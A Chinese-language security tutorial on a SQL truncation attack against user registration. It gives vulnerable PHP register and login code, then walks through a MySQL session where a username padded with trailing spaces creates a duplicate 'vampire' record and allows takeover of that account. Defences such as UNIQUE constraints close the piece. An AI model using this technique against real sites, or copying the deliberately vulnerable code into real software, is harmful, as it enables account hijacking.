基于約束條件的SQL攻擊
引言
目前值得高興的是,開發者在建立網站時,已經開始關注安全問題了——幾乎每個開發者都知道SQL注入漏洞了。在本文中,我將為讀者介紹另一種與SQL數據庫相關的漏洞,雖然它的危害性與SQL注入不相上下,但目前卻很少為人所知。接下來,我將為讀者詳細展示這種攻擊手法,以及相應的防御策略。
背景知識
最近,我遇到了一段有趣的代碼,它嘗試盡一切可能來保護數據庫的訪問安全,例如每當新用戶進行注冊時,將運行以下代碼:
- <?php
- // Checking whether a user with the same username exists
- $username = mysql_real_escape_string($_GET['username']);
- $password = mysql_real_escape_string($_GET['password']);
- $query = "SELECT *
- FROM users
- WHERE username='$username'";
- $res = mysql_query($query, $database);
- if($res) {
- if(mysql_num_rows($res) > 0) {
- // User exists, exit gracefully
- .
- .
- }
- else {
- // If not, only then insert a new entry
- $query = "INSERT INTO users(username, password)
- VALUES ('$username','$password')";
- .
- .
- }
- }
為了驗證登錄信息,將用到下列代碼:
- <?php
- $username = mysql_real_escape_string($_GET['username']);
- $password = mysql_real_escape_string($_GET['password']);
- $query = "SELECT username FROM users
- WHERE username='$username'
- AND password='$password' ";
- $res = mysql_query($query, $database);
- if($res) {
- if(mysql_num_rows($res) > 0){
- $row = mysql_fetch_assoc($res);
- return $row['username'];
- }
- }
- return Null;
安全注意事項周全嗎?
過濾用戶輸入參數了嗎? - 檢查了
使用單引號(')來增加安全性了嗎? - 檢查了
很好,還有什么可能出錯的地方嗎?
是的,攻擊者依然能夠以任意用戶身份進行登錄!
攻擊手法
在談論這種攻擊手法之前,首先需要介紹幾個至關重要的知識點。
1. 在處理SQL中的字符串時,字符串末尾的空格字符都會被刪除。換句話說,“vampire”與“vampire ”幾乎是等效的,這在大多數情況下是正確的,例如WHERE子句中的字符串或INSERT語句中的字符串。例如,以下語句的查詢結果,與使用用戶名“vampire”進行查詢時的結果是一樣的。
- SELECT * FROM users WHERE username='vampire ';
但是,除此之外也確實存在例外情況,例如LIKE子句。注意,對尾部空白字符的這種修剪操作,主要是在“字符串比較”期間進行的。這是因為,SQL會在內部使用空格來填充字符串,以便在比較之前使其它們的長度保持一致。
2. 在任意INSERT查詢中,SQL會根據varchar(n)來限制字符串的最大長度,也就是說,如果字符串的長度大于“n”個字符的話,那么僅使用字符串的前“n”個字符。例如,如果特定列的長度約束為“5”個字符,那么在插入字符串“vampire”時,實際上只能插入字符串的前5個字符,即“vampi”。
現在,讓我們建立一個測試數據庫來演示具體攻擊過程。
- vampire@linux:~$ mysql -u root -p
- mysql> CREATE DATABASE testing;
- Query OK, 1 row affected (0.03 sec)
- mysql> USE testing;
- Database changed
我將創建一個數據表users,它有兩列,即username和password。并且,這兩個字段的最大長度為25個字符。接下來,我將插入一行記錄,其中以“vampire”作為用戶名,以“my_password”作為密碼。
- mysql> CREATE TABLE users (
- -> username varchar(25),
- -> password varchar(25)
- -> );
- Query OK, 0 rows affected (0.09 sec)
- mysql> INSERT INTO users
- -> VALUES('vampire', 'my_password');
- Query OK, 1 row affected (0.11 sec)
- mysql> SELECT * FROM users;
- +----------+-------------+
- | username | password |
- +----------+-------------+
- | vampire | my_password |
- +----------+-------------+
- 1 row in set (0.00 sec)
為了展示尾部空白字符的修剪情況,我們可以輸入下列命令:
- mysql> SELECT * FROM users
- -> WHERE username='vampire ';
- +----------+-------------+
- | username | password |
- +----------+-------------+
- | vampire | my_password |
- +----------+-------------+
- 1 row in set (0.00 sec)
現在,假設一個易受攻擊的網站使用了前面提到的PHP代碼來處理用戶的注冊和登錄。為了入侵任意用戶的帳戶(就本例來說,用戶名為“vampire”),只需使用用戶名“vampire[一些空白字符]1”和一個隨機密碼進行注冊即可。對于選擇的用戶名,前25個字符應該只包含vampire和空白字符。這樣做的好處是,將有助于繞過檢查特定用戶名是否已存在的查詢。
- mysql> SELECT * FROM users
- -> WHERE username='vampire 1';
- Empty set (0.00 sec)
需要注意的是,在執行SELECT查詢語句時,SQL是不會將字符串縮短為25個字符的。因此,這里將使用完整的字符串進行搜索,所以不會找到匹配的結果。接下來,當運行INSERT查詢語句時,它只會插入前25個字符。
- mysql> INSERT INTO users(username, password)
- -> VALUES ('vampire 1', 'random_pass');
- Query OK, 1 row affected, 1 warning (0.05 sec)
- mysql> SELECT * FROM users
- -> WHERE username='vampire';
- +---------------------------+-------------+
- | username | password |
- +---------------------------+-------------+
- | vampire | my_password |
- | vampire | random_pass |
- +---------------------------+-------------+
- 2 rows in set (0.00 sec)
很好,如果現在搜索“vampire”的話,將返回兩個用戶。注意,第二個用戶名實際上是“vampire”加上尾部的18個空格。現在,如果使用用戶名“vampire”和密碼“random_pass”登錄的話,則所有搜索該用戶名的SELECT查詢都將返回第一個數據記錄,也就是原始的數據記錄。這樣的話,攻擊者就能夠以原始用戶身份登錄。
這個攻擊已經在MySQL和SQLite上成功通過測試。我相信它同樣適用于其他數據庫下。
防御措施
顯然,要想開發安全的軟件,必須對這種安全漏洞嚴加防范。下面是我們可采取的幾項防御措施:
1. 應該為要求/預期具有唯一性的那些列添加UNIQUE約束。這實際上是一個非常重要的軟件開發規則。即使您的代碼已經提供了完整性檢查,也要正確定義您的數據。由于'username'列具有UNIQUE約束,所以插入另一個記錄將是不可能的。這兩個字符串將被視為等同的,并且INSERT查詢將失敗。
2. 最好使用'id'作為數據庫表的主鍵。此外,數據應該通過程序中的id進行跟蹤。
3. 為了增加安全性,您還可以手動方式將輸入參數修剪為特定長度(具體長度可以視數據庫的中設置而定)。
